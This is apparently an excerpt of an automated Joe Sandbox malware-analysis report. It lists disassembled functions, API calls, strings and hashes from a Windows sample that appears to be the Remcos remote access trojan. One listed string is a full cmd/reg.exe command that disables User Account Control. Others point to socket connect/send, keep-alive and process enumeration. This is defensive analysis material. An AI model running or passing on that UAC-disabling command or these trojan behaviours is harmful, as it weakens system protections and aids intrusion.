                                      • CloseHandle.KERNEL32(?), ref: 004077AA
                                      • CloseHandle.KERNEL32(?), ref: 004077AF
                                      Strings
                                      • C:\Windows\System32\cmd.exe, xrefs: 00407796
                                      • /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f, xrefs: 00407791
                                      Memory Dump Source
                                      • Source File: 0000000C.00000002.1517046290.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_12_2_400000_NvbYSEq.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: CloseHandle$CreateProcess
                                      • String ID: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f$C:\Windows\System32\cmd.exe
                                      • API String ID: 2922976086-4183131282
                                      • Opcode ID: 86afbde76f2a9426f4ed7e8e7c7881cd7a3c7ba11745d0fd7a0dc136aa7099f4
                                      • Instruction ID: bcd6b2dc2297655d1c2a6c7a9d844aadd79638dc8707381bf3a952a3ff6736b4
                                      • Opcode Fuzzy Hash: 86afbde76f2a9426f4ed7e8e7c7881cd7a3c7ba11745d0fd7a0dc136aa7099f4
                                      • Instruction Fuzzy Hash: BCF03676D4029D76CB20ABD6DC0EEDF7F7DEBC5B11F00056AF904A6141E6746404C6B9
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 00407260 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 40COMMON
                                      Download Yara Rule
                                      Strings
                                      Memory Dump Source
                                      • Source File: 0000000C.00000002.1517046290.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_12_2_400000_NvbYSEq.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID:
                                      • String ID: SG$C:\Users\user\AppData\Roaming\NvbYSEq.exe
                                      • API String ID: 0-3615582252
                                      • Opcode ID: aeb7ec08203138e6f15c389ffc7d883b5859742f8fda7ba0964a05b6f7ae7d1f
                                      • Instruction ID: 1b954d03a55cc3c1a25a26db856d3c6076ddce7f3b9fad0ad77fefb3a3407f05
                                      • Opcode Fuzzy Hash: aeb7ec08203138e6f15c389ffc7d883b5859742f8fda7ba0964a05b6f7ae7d1f
                                      • Instruction Fuzzy Hash: 2CF046B0F14A00EBCB0467655D186693A05A740356F404C77F907EA2F2EBBD5C41C61E
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 004050E4 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 35synchronizationCOMMON
                                      Download Yara Rule
                                      APIs
                                      • CreateEventA.KERNEL32(00000000,00000000,00000000,00000000,00474EF8), ref: 00405120
                                      • SetEvent.KERNEL32(?), ref: 0040512C
                                      • WaitForSingleObject.KERNEL32(?,000000FF), ref: 00405137
                                      • CloseHandle.KERNEL32(?), ref: 00405140
                                        • Part of subcall function 0041B4EF: GetLocalTime.KERNEL32(00000000), ref: 0041B509
                                      Strings
                                      Memory Dump Source
                                      • Source File: 0000000C.00000002.1517046290.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_12_2_400000_NvbYSEq.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: Event$CloseCreateHandleLocalObjectSingleTimeWait
                                      • String ID: KeepAlive | Disabled
                                      • API String ID: 2993684571-305739064
                                      • Opcode ID: 09248d073b904291628f2a82f92fe6a987867c86155402bef043dd91105bf09b
                                      • Instruction ID: c1447ea2195e795a2fa4d382ed9a15925dec3dc8ccf256ab7d783030aa8980db
                                      • Opcode Fuzzy Hash: 09248d073b904291628f2a82f92fe6a987867c86155402bef043dd91105bf09b
                                      • Instruction Fuzzy Hash: 4CF06271904711BBDB103B758D0A66B7A54AB02311F0009BEF982916E2D6798840CF9A
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 0041ADC0 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 30sleepCOMMON
                                      Download Yara Rule
                                      APIs
                                        • Part of subcall function 0041B4EF: GetLocalTime.KERNEL32(00000000), ref: 0041B509
                                      • GetModuleHandleA.KERNEL32(00000000,00020009), ref: 0041ADF2
                                      • PlaySoundW.WINMM(00000000,00000000), ref: 0041AE00
                                      • Sleep.KERNEL32(00002710), ref: 0041AE07
                                      • PlaySoundW.WINMM(00000000,00000000,00000000), ref: 0041AE10
                                      Strings
                                      Memory Dump Source
                                      • Source File: 0000000C.00000002.1517046290.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_12_2_400000_NvbYSEq.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: PlaySound$HandleLocalModuleSleepTime
                                      • String ID: Alarm triggered
                                      • API String ID: 614609389-2816303416
                                      • Opcode ID: b7b395eb2d8a8c6ac5b29d0703eec326aa80e776d4c85912c0c2915f52647228
                                      • Instruction ID: 9c0713ce1321a11b0f254193fe9a85ef30a97b7eb59a64372af151f10574a600
                                      • Opcode Fuzzy Hash: b7b395eb2d8a8c6ac5b29d0703eec326aa80e776d4c85912c0c2915f52647228
                                      • Instruction Fuzzy Hash: 36E01226B44260779620377B6D4FD6F3D28DAC2B5170100BEFA0666192D9580C4586FB
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 0041CD58 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 27COMMON
                                      Download Yara Rule
                                      APIs
                                      • GetStdHandle.KERNEL32(000000F5,00000000,?,?,?,?,?,?,0041CDED), ref: 0041CD62
                                      • GetConsoleScreenBufferInfo.KERNEL32(00000000,?,?,?,?,?,?,?,0041CDED), ref: 0041CD6F
                                      • SetConsoleTextAttribute.KERNEL32(00000000,0000000C,?,?,?,?,?,?,0041CDED), ref: 0041CD7C
                                      • SetConsoleTextAttribute.KERNEL32(00000000,?,?,?,?,?,?,?,0041CDED), ref: 0041CD8F
                                      Strings
                                      • ______ (_____ \ _____) )_____ ____ ____ ___ ___ | __ /| ___ | \ / ___) _ \ /___)| | \ \| ____| | | ( (__| |_| |___ ||_| |_|_____)_|_|_|\____)___/(___/ , xrefs: 0041CD82
                                      Memory Dump Source
                                      • Source File: 0000000C.00000002.1517046290.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_12_2_400000_NvbYSEq.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: Console$AttributeText$BufferHandleInfoScreen
                                      • String ID: ______ (_____ \ _____) )_____ ____ ____ ___ ___ | __ /| ___ | \ / ___) _ \ /___)| | \ \| ____| | | ( (__| |_| |___ ||_| |_|_____)_|_|_|\____)___/(___/
                                      • API String ID: 3024135584-2418719853
                                      • Opcode ID: 7fe6fe9ce11b1ae804115fcba13355f31785efbed8ffac05f5782df1f2ab6211
                                      • Instruction ID: 0b88db63cd78dea0703aeaf814a7171c31f7e2e6e0b1944ffb711cb25cf7542c
                                      • Opcode Fuzzy Hash: 7fe6fe9ce11b1ae804115fcba13355f31785efbed8ffac05f5782df1f2ab6211
                                      • Instruction Fuzzy Hash: B4E04872904315E7E31027B5EC4DDAB7B7CE745713B100266FA12915D39A749C40C6B5
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 0044139A Relevance: 7.7, APIs: 5, Instructions: 222COMMONLIBRARYCODE
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 0000000C.00000002.1517046290.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_12_2_400000_NvbYSEq.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 333ae2597f59f70c30e2a138da7d2dacca2148bf7cc6369c5742e0f4ac8aaabd
                                      • Instruction ID: 3288ceb70b28299b768e57bc56a65f905b411dc47ae91625c595fe6b39b3afde
                                      • Opcode Fuzzy Hash: 333ae2597f59f70c30e2a138da7d2dacca2148bf7cc6369c5742e0f4ac8aaabd
                                      • Instruction Fuzzy Hash: 4D71C431900256ABEF21CF55C884AFFBBB5EF95350F14012BE812A72A1D7748CC1CBA9
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 00444CFB Relevance: 7.7, APIs: 5, Instructions: 187COMMONLIBRARYCODE
                                      Download Yara Rule
                                      APIs
                                        • Part of subcall function 00446137: RtlAllocateHeap.NTDLL(00000000,004352BC,?,?,00438847,?,?,00000000,00476B50,?,0040DE62,004352BC,?,?,?,?), ref: 00446169
                                      • _free.LIBCMT ref: 00444E06
                                      • _free.LIBCMT ref: 00444E1D
                                      • _free.LIBCMT ref: 00444E3C
                                      • _free.LIBCMT ref: 00444E57
                                      • _free.LIBCMT ref: 00444E6E
                                      Memory Dump Source
                                      • Source File: 0000000C.00000002.1517046290.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_12_2_400000_NvbYSEq.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: _free$AllocateHeap
                                      • String ID:
                                      • API String ID: 3033488037-0
                                      • Opcode ID: bf8b46b868af2ecf30d3444370171b65bdd51122b8350dbbe1b9982e260663b5
                                      • Instruction ID: 75a60bec03265776b93b53542ea819fdab521e44af267d44e1f719a945e8e2e2
                                      • Opcode Fuzzy Hash: bf8b46b868af2ecf30d3444370171b65bdd51122b8350dbbe1b9982e260663b5
                                      • Instruction Fuzzy Hash: 5451D371A00704AFEB20DF6AC841B6673F4FF85729B14456EE819D7250E739EE01CB88
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 00449365 Relevance: 7.7, APIs: 5, Instructions: 171timeCOMMONLIBRARYCODE
                                      Download Yara Rule
                                      APIs
                                      • GetTimeZoneInformation.KERNEL32(?,00000000,00000000,00000000,?,0045F234), ref: 004493CF
                                      • WideCharToMultiByte.KERNEL32(00000000,00000000,00472764,000000FF,00000000,0000003F,00000000,?,?), ref: 00449447
                                      • WideCharToMultiByte.KERNEL32(00000000,00000000,004727B8,000000FF,?,0000003F,00000000,?), ref: 00449474
                                      • _free.LIBCMT ref: 004493BD
                                        • Part of subcall function 00446782: HeapFree.KERNEL32(00000000,00000000,?,00450C6F,?,00000000,?,00000000,?,00450F13,?,00000007,?,?,0045145E,?), ref: 00446798
                                        • Part of subcall function 00446782: GetLastError.KERNEL32(?,?,00450C6F,?,00000000,?,00000000,?,00450F13,?,00000007,?,?,0045145E,?,?), ref: 004467AA
                                      • _free.LIBCMT ref: 00449589
                                      Memory Dump Source
                                      • Source File: 0000000C.00000002.1517046290.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_12_2_400000_NvbYSEq.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: ByteCharMultiWide_free$ErrorFreeHeapInformationLastTimeZone
                                      • String ID:
                                      • API String ID: 1286116820-0
                                      • Opcode ID: 0a3c6fbe7e5a1f133d1032b40f823fca6b3dff27f0c0d46b4efcd8c71cfe77a6
                                      • Instruction ID: c95a83c4fc9d8f5f381c6ef12c4bd90d50aad01b0883e3b7d6e96279f2ead045
                                      • Opcode Fuzzy Hash: 0a3c6fbe7e5a1f133d1032b40f823fca6b3dff27f0c0d46b4efcd8c71cfe77a6
                                      • Instruction Fuzzy Hash: 71511A71904205EBEB14EFA9DD819AFB7BCEF44324F10066FE51493291EB788E42DB58
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 0040F8FD Relevance: 7.6, APIs: 5, Instructions: 132processCOMMON
                                      Download Yara Rule
                                      APIs
                                        • Part of subcall function 0041BFB7: GetCurrentProcess.KERNEL32(?,?,?,0040DAAA,WinDir,00000000,00000000), ref: 0041BFC8
                                      • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 0040F91B
                                      • Process32FirstW.KERNEL32(00000000,?), ref: 0040F93F
                                      • Process32NextW.KERNEL32(00000000,0000022C), ref: 0040F94E
                                      • CloseHandle.KERNEL32(00000000), ref: 0040FB05
                                        • Part of subcall function 0041BFE5: OpenProcess.KERNEL32(00000400,00000000,?,?,00000000,0040F5F9,00000000,?,?,00475338), ref: 0041BFFA
                                        • Part of subcall function 0041C1DD: OpenProcess.KERNEL32(00001000,00000000,?,00000000,00000000,00000000), ref: 0041C1F5
                                        • Part of subcall function 0041C1DD: OpenProcess.KERNEL32(00000400,00000000,?,?,00000000,00000000,00000000), ref: 0041C208
                                      • Process32NextW.KERNEL32(00000000,0000022C), ref: 0040FAF6
                                      Memory Dump Source
                                      • Source File: 0000000C.00000002.1517046290.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_12_2_400000_NvbYSEq.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: Process$OpenProcess32$Next$CloseCreateCurrentFirstHandleSnapshotToolhelp32
                                      • String ID:
                                      • API String ID: 4269425633-0
                                      • Opcode ID: 371d05c907dcca9c3c12ab80cf798e7523ffd5e5ecf3e3ca40c8afe2c02f4cbd
                                      • Instruction ID: d179df5438ecf7187d550cf9263b6860c2801d48d571b2859f9d543a591e132f
                                      • Opcode Fuzzy Hash: 371d05c907dcca9c3c12ab80cf798e7523ffd5e5ecf3e3ca40c8afe2c02f4cbd
                                      • Instruction Fuzzy Hash: 784116311083419BC325F722DC55AEFB3A5AF94345F50493EF48A921E2EF385A49C75A
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 00443DF9 Relevance: 7.6, APIs: 5, Instructions: 129COMMONLIBRARYCODE
                                      Download Yara Rule
                                      APIs
                                      Memory Dump Source
                                      • Source File: 0000000C.00000002.1517046290.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_12_2_400000_NvbYSEq.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: _free
                                      • String ID:
                                      • API String ID: 269201875-0
                                      • Opcode ID: f0d0e5395ad938097262dc5d88931f0578874cbbbca0d0094bbf983591b431c8
                                      • Instruction ID: 5dce3a056f7b38871bf3701478ebec2c01ef4ac0d1e4adeac0a27022f106ca0c
                                      • Opcode Fuzzy Hash: f0d0e5395ad938097262dc5d88931f0578874cbbbca0d0094bbf983591b431c8
                                      • Instruction Fuzzy Hash: 0741F536A012009FEB20DF78C881A5EB3F1EF89B14F2545AEE515EB341DB35AE01CB84
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 0044F35A Relevance: 7.6, APIs: 5, Instructions: 68COMMON
                                      Download Yara Rule
                                      APIs
                                      • GetEnvironmentStringsW.KERNEL32 ref: 0044F363
                                      • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 0044F386
                                        • Part of subcall function 00446137: RtlAllocateHeap.NTDLL(00000000,004352BC,?,?,00438847,?,?,00000000,00476B50,?,0040DE62,004352BC,?,?,?,?), ref: 00446169
                                      • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,00000000,00000000), ref: 0044F3AC
                                      • _free.LIBCMT ref: 0044F3BF
                                      • FreeEnvironmentStringsW.KERNEL32(00000000), ref: 0044F3CE
                                      Memory Dump Source
                                      • Source File: 0000000C.00000002.1517046290.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_12_2_400000_NvbYSEq.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: ByteCharEnvironmentMultiStringsWide$AllocateFreeHeap_free
                                      • String ID:
                                      • API String ID: 336800556-0
                                      • Opcode ID: 02a97bdb6e6c5d26fe886d3a9ae646317caea956d8251916105bf2d3fe3a3540
                                      • Instruction ID: 8337c1946637dec1c7c9c61cb05458c13fbc509b7d73539ecc926bc10a2836fd
                                      • Opcode Fuzzy Hash: 02a97bdb6e6c5d26fe886d3a9ae646317caea956d8251916105bf2d3fe3a3540
                                      • Instruction Fuzzy Hash: 2301B173601755BB37211ABA5C8CC7F6A6CDAC6FA5315013FFD14C2202EA68CD0581B9
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 0041C3F1 Relevance: 7.6, APIs: 5, Instructions: 67fileCOMMON
                                      Download Yara Rule
                                      APIs
                                      • CreateFileW.KERNEL32(00000004,40000000,00000000,00000000,00000002,00000080,00000000,00000000,00000000,?,00000004,00000000,0041C510,00000000,00000000,00000000), ref: 0041C430
                                      • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000002,?,00000004,00000000,0041C510,00000000,00000000), ref: 0041C44D
                                      • CloseHandle.KERNEL32(00000000,?,00000004,00000000,0041C510,00000000,00000000), ref: 0041C459
                                      • WriteFile.KERNEL32(00000000,00000000,00000000,00406F85,00000000,?,00000004,00000000,0041C510,00000000,00000000), ref: 0041C46A
                                      • CloseHandle.KERNEL32(00000000,?,00000004,00000000,0041C510,00000000,00000000), ref: 0041C477
                                      Memory Dump Source
                                      • Source File: 0000000C.00000002.1517046290.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_12_2_400000_NvbYSEq.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: File$CloseHandle$CreatePointerWrite
                                      • String ID:
                                      • API String ID: 1852769593-0
                                      • Opcode ID: c16bf2a5e476d7eb9c065cb57b6c83635d373e8a2041914a8f43a70e8d32cf2e
                                      • Instruction ID: 5cb8be75c3dc4c1e2f747800af3fbfd5a98fa41e64789a84fd548ad7506a8702
                                      • Opcode Fuzzy Hash: c16bf2a5e476d7eb9c065cb57b6c83635d373e8a2041914a8f43a70e8d32cf2e
                                      • Instruction Fuzzy Hash: B0110471288220FFEA104B24ACD9EFB739CEB46375F10462AF592C22C1C7259C81863A
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 00448299 Relevance: 7.6, APIs: 5, Instructions: 53COMMONLIBRARYCODE
                                      Download Yara Rule
                                      APIs
                                      • GetLastError.KERNEL32(?,00000000,?,0043BC87,00000000,?,?,0043BD0B,00000000,00000000,00000000,00000000,00000000,?,?), ref: 0044829E
                                      • _free.LIBCMT ref: 004482D3
                                      • _free.LIBCMT ref: 004482FA
                                      • SetLastError.KERNEL32(00000000), ref: 00448307
                                      • SetLastError.KERNEL32(00000000), ref: 00448310
                                      Memory Dump Source
                                      • Source File: 0000000C.00000002.1517046290.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_12_2_400000_NvbYSEq.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: ErrorLast$_free
                                      • String ID:
                                      • API String ID: 3170660625-0
                                      • Opcode ID: 3b5a676440ed160f08d3b9c67501060176d9d4d3bcfe02f134d94644f9898a15
                                      • Instruction ID: 817e1e76de570c2b023109a843fda652767a1b5a915d0172e9d2adf04509528a
                                      • Opcode Fuzzy Hash: 3b5a676440ed160f08d3b9c67501060176d9d4d3bcfe02f134d94644f9898a15
                                      • Instruction Fuzzy Hash: 5601F936500B0067F3112A2A5C8596F2559EBC2B7A735452FFD19A22D2EFADCC01816D
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 004509BC Relevance: 7.5, APIs: 5, Instructions: 40COMMONLIBRARYCODE
                                      Download Yara Rule
                                      APIs
                                      • _free.LIBCMT ref: 004509D4
                                        • Part of subcall function 00446782: HeapFree.KERNEL32(00000000,00000000,?,00450C6F,?,00000000,?,00000000,?,00450F13,?,00000007,?,?,0045145E,?), ref: 00446798
                                        • Part of subcall function 00446782: GetLastError.KERNEL32(?,?,00450C6F,?,00000000,?,00000000,?,00450F13,?,00000007,?,?,0045145E,?,?), ref: 004467AA
                                      • _free.LIBCMT ref: 004509E6
                                      • _free.LIBCMT ref: 004509F8
                                      • _free.LIBCMT ref: 00450A0A
                                      • _free.LIBCMT ref: 00450A1C
                                      Memory Dump Source
                                      • Source File: 0000000C.00000002.1517046290.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_12_2_400000_NvbYSEq.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: _free$ErrorFreeHeapLast
                                      • String ID:
                                      • API String ID: 776569668-0
                                      • Opcode ID: 3215379f381551316c6ac489d477ac1f9e59373460363398d28d4bb450e902e5
                                      • Instruction ID: 8e1836d4b3683ea2f551dac33bf8b94159c93f8dbbc189607f67f5fa0db289e6
                                      • Opcode Fuzzy Hash: 3215379f381551316c6ac489d477ac1f9e59373460363398d28d4bb450e902e5
                                      • Instruction Fuzzy Hash: F3F04F76504600B79620EB5DE8C2C1B73D9EA0571A795891BF66CDB612CB38FCC0869C
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 00444048 Relevance: 7.5, APIs: 5, Instructions: 30COMMON
                                      Download Yara Rule
                                      APIs
                                      • _free.LIBCMT ref: 00444066
                                        • Part of subcall function 00446782: HeapFree.KERNEL32(00000000,00000000,?,00450C6F,?,00000000,?,00000000,?,00450F13,?,00000007,?,?,0045145E,?), ref: 00446798
                                        • Part of subcall function 00446782: GetLastError.KERNEL32(?,?,00450C6F,?,00000000,?,00000000,?,00450F13,?,00000007,?,?,0045145E,?,?), ref: 004467AA
                                      • _free.LIBCMT ref: 00444078
                                      • _free.LIBCMT ref: 0044408B
                                      • _free.LIBCMT ref: 0044409C
                                      • _free.LIBCMT ref: 004440AD
                                      Memory Dump Source
                                      • Source File: 0000000C.00000002.1517046290.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_12_2_400000_NvbYSEq.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: _free$ErrorFreeHeapLast
                                      • String ID:
                                      • API String ID: 776569668-0
                                      • Opcode ID: d22801927142449f45bafb541f3c6c05cfc56c6a25697691e9266b530bc09d46
                                      • Instruction ID: c4ed0220327abb1134bcf7d54e43c2409a3611c90002b0fe773cef56a7474a4d
                                      • Opcode Fuzzy Hash: d22801927142449f45bafb541f3c6c05cfc56c6a25697691e9266b530bc09d46
                                      • Instruction Fuzzy Hash: 11F03AB18009208FA631AF2DBD414053B61E705769346822BF62C62A70C7B94ED2CFCF
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 0044BA37 Relevance: 7.2, APIs: 3, Strings: 1, Instructions: 186COMMONLIBRARYCODE
                                      Download Yara Rule
                                      Strings
                                      Memory Dump Source
                                      • Source File: 0000000C.00000002.1517046290.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_12_2_400000_NvbYSEq.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID:
                                      • String ID: PkGNG
                                      • API String ID: 0-263838557
                                      • Opcode ID: 6a83c2428ddcf6ea71a3f14a315267ad78d224b448d93c685a7e270e7132f7c7
                                      • Instruction ID: 56b21f6c39f874414c878b072b89285690216c2d241c0ad811085e1835033e53
                                      • Opcode Fuzzy Hash: 6a83c2428ddcf6ea71a3f14a315267ad78d224b448d93c685a7e270e7132f7c7
                                      • Instruction Fuzzy Hash: 1B51B271D00249AAEF14DFA9C885FAFBBB8EF45314F14015FE400A7291DB78D901CBA9
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 0044E6E9 Relevance: 7.2, APIs: 2, Strings: 2, Instructions: 168COMMON
                                      Download Yara Rule
                                      APIs
                                      • _strpbrk.LIBCMT ref: 0044E738
                                      • _free.LIBCMT ref: 0044E855
                                        • Part of subcall function 0043BD19: IsProcessorFeaturePresent.KERNEL32(00000017,0043BCEB,?,?,?,?,?,00000000,?,?,0043BD0B,00000000,00000000,00000000,00000000,00000000), ref: 0043BD1B
                                        • Part of subcall function 0043BD19: GetCurrentProcess.KERNEL32(C0000417), ref: 0043BD3D
                                        • Part of subcall function 0043BD19: TerminateProcess.KERNEL32(00000000), ref: 0043BD44
                                      Strings
                                      Memory Dump Source
                                      • Source File: 0000000C.00000002.1517046290.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_12_2_400000_NvbYSEq.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: Process$CurrentFeaturePresentProcessorTerminate_free_strpbrk
                                      • String ID: *?$.
                                      • API String ID: 2812119850-3972193922
                                      • Opcode ID: 6703a85dd49711e1afab558f77f60869b6155e4f96c4351f2947c71862cae23b
                                      • Instruction ID: 94a4b4bbf586d133b1ca6d09685756ea089c4dad0dcc4a5060c65dcbb11523ea
                                      • Opcode Fuzzy Hash: 6703a85dd49711e1afab558f77f60869b6155e4f96c4351f2947c71862cae23b
                                      • Instruction Fuzzy Hash: B951C375E00109EFEF14DFAAC881AAEBBB5FF58314F25816EE454E7301E6399E018B54
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 00415AEA Relevance: 7.2, APIs: 2, Strings: 2, Instructions: 163COMMON
                                      Download Yara Rule
                                      APIs
                                      Strings
                                      Memory Dump Source
                                      • Source File: 0000000C.00000002.1517046290.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_12_2_400000_NvbYSEq.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: CountEventTick
                                      • String ID: !D@$NG
                                      • API String ID: 180926312-2721294649
                                      • Opcode ID: 3d261558ad018fccd4b1db3b2adf3e9912d7a273ea376c309d6eaae2c8c0653a
                                      • Instruction ID: 1740d3d485f2be3f914829e5aa2a54ae858af1ae40273f66f7ff2800e9d96298
                                      • Opcode Fuzzy Hash: 3d261558ad018fccd4b1db3b2adf3e9912d7a273ea376c309d6eaae2c8c0653a
                                      • Instruction Fuzzy Hash: 7E51A1316083019AC724FB32D852AEF73A5AF94314F50493FF54A671E2EF3C5949C68A
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 00409EA3 Relevance: 7.2, APIs: 1, Strings: 3, Instructions: 157COMMON
                                      Download Yara Rule
                                      APIs
                                      • GetKeyboardLayoutNameA.USER32(?), ref: 00409ED3
                                        • Part of subcall function 004048C8: connect.WS2_32(?,?,?), ref: 004048E0
                                        • Part of subcall function 0041C515: CreateFileW.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000080,00000000,?,00000000,00409F5B,00474EE0,?,00474EE0,00000000,00474EE0,00000000), ref: 0041C52A
                                        • Part of subcall function 00404AA1: send.WS2_32(?,00000000,00000000,00000000), ref: 00404B36
                                      Strings
                                      Memory Dump Source
                                      • Source File: 0000000C.00000002.1517046290.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_12_2_400000_NvbYSEq.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: CreateFileKeyboardLayoutNameconnectsend
                                      • String ID: XQG$NG$PG
                                      • API String ID: 1634807452-3565412412
                                      • Opcode ID: 54480eb0bc649cc79f0ae2d6016b7d596c1c2f6fed1d275c9adea3c12e8bc9d3
                                      • Instruction ID: e0ccbd324811511655e6ba18c086c0ffec884fa52ef92f7e14ea490dcf81b303
                                      • Opcode Fuzzy Hash: 54480eb0bc649cc79f0ae2d6016b7d596c1c2f6fed1d275c9adea3c12e8bc9d3
                                      • Instruction Fuzzy Hash: BA5133315082415AC324F732D852AEFB3E5AFD4348F50493FF44A671E6EF78594AC649
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 00442385 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 147COMMON
                                      Download Yara Rule
                                      APIs
                                      • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 004424DE
                                      • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 004424F3
                                      Strings
                                      Memory Dump Source
                                      • Source File: 0000000C.00000002.1517046290.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_12_2_400000_NvbYSEq.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
                                      • String ID: `#D$`#D
                                      • API String ID: 885266447-2450397995
                                      • Opcode ID: 36fac044672f79bbd2692348072d6fa41419b258ac2755bfc370d2617ef2a991
                                      • Instruction ID: d0478598ef992627c852fcfbe86add3ca1c9fa58067414995f231753f3186543
                                      • Opcode Fuzzy Hash: 36fac044672f79bbd2692348072d6fa41419b258ac2755bfc370d2617ef2a991
                                      • Instruction Fuzzy Hash: 78519071A00208AFDF18DF59C980AAEBBB2FB94314F59C19AF81897361D7B9DD41CB44
                                      Uniqueness

                                      Uniqueness Score: -1.00%

